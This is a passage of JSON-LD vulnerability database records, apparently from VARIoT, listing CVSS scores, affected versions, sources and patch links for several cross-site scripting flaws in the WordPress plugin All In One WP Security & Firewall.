            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.5"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.5"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          }
        ]
      },
      "cve": "CVE-2016-10868",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2016-10868",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-89687",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-10868",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10868",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10868",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-850",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89687",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.5 for WordPress has XSS in the blacklist, file system, and file change detection settings pages. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10868",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89687",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "id": "VAR-201908-1125",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T22:29:58.271000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96540"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10868"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10868"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "date": "2019-08-13T17:15:12.233000",
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89687"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          },
          {
            "date": "2024-11-21T02:44:56.800000",
            "db": "NVD",
            "id": "CVE-2016-10868"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007682"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-850"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1202

    Vulnerability from variot - Updated: 2024-11-23 21:59

    The all-in-one-wp-security-and-firewall plugin before 3.9.8 for WordPress has XSS in the unlock request feature. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1202",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "3.9.8"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.9.8"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          }
        ]
      },
      "cve": "CVE-2015-9293",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2015-9293",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-87254",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2015-9293",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-9293",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-9293",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-839",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-87254",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 3.9.8 for WordPress has XSS in the unlock request feature. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-9293",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-87254",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "id": "VAR-201908-1202",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T21:59:43.371000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96530"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9293"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-9293"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "date": "2019-08-13T17:15:11.627000",
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87254"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          },
          {
            "date": "2024-11-21T02:40:16.363000",
            "db": "NVD",
            "id": "CVE-2015-9293"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007699"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-839"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1123

    Vulnerability from variot - Updated: 2024-11-23 21:52

    The all-in-one-wp-security-and-firewall plugin before 4.2.0 for WordPress has multiple XSS issues. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1123",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.2.0"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.2.0"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          }
        ]
      },
      "cve": "CVE-2016-10866",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
